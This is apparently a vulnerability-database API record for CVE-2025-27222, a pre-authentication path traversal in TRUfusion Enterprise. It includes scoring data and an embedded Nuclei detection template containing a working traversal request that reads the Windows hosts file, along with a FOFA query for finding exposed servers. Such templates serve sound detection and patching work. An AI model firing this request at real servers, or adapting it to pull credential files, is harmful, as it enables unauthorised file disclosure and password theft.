{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-27222/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-27222/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-27222/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-27222/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-27222/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-27222"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-27222"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.01867,
      "kev": false,
      "percentile": 0.7839
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-27222.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2025-27222\n\ninfo:\n  name: TRUfusion Enterprise <= 7.10.4.0 - Path Traversal\n  author: DhiyaneshDK,rcesecurity\n  severity: critical\n  description: |\n    Pre-Auth Path Traversal Allowing to Leak Local server files disclosing sensitive clear-text passwords.\n  impact: |\n    Unauthenticated attackers can exploit path traversal to read arbitrary files from the server, potentially exposing sensitive clear-text passwords, configuration files, and other confidential data.\n  remediation: |\n    Upgrade TRUfusion Enterprise to a secure version by updating to one of the following releases: 7.10.3.1, 7.10.1.1, 7.10.1.0, 7.10.3.0, 7.9.6.1, 7.9.6.0, 7.9.5.0, 7.9.4.0, 7.9.3.1, 7.9.3.0, 7.9.2.1, 7.10.2.0, or 7.10.0.1.\n  reference:\n    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27222.txt\n    - https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/\n    - https://docs.rocketsoftware.com/bundle/trufusion_rn_71031/page/kwg1743156415157.html\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"TRUfusion\"\n  tags: cve,cve2025,trufusion,lfi,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /trufusionPortal/getCobrandingData?cobrandingImageName=../../../../../../Windows/System32/drivers/etc/hosts HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"MTI3LjAuMC4x\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502206144cb60a218f608ec256250b8585d49eb10b42e86f67053673b4f6cec9f33c5022100d2c9c63fdaf4197fbfd92168e81f1ecb29ce6e4d6ee41e6bc6d8f7f3339963ee:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-27222"
}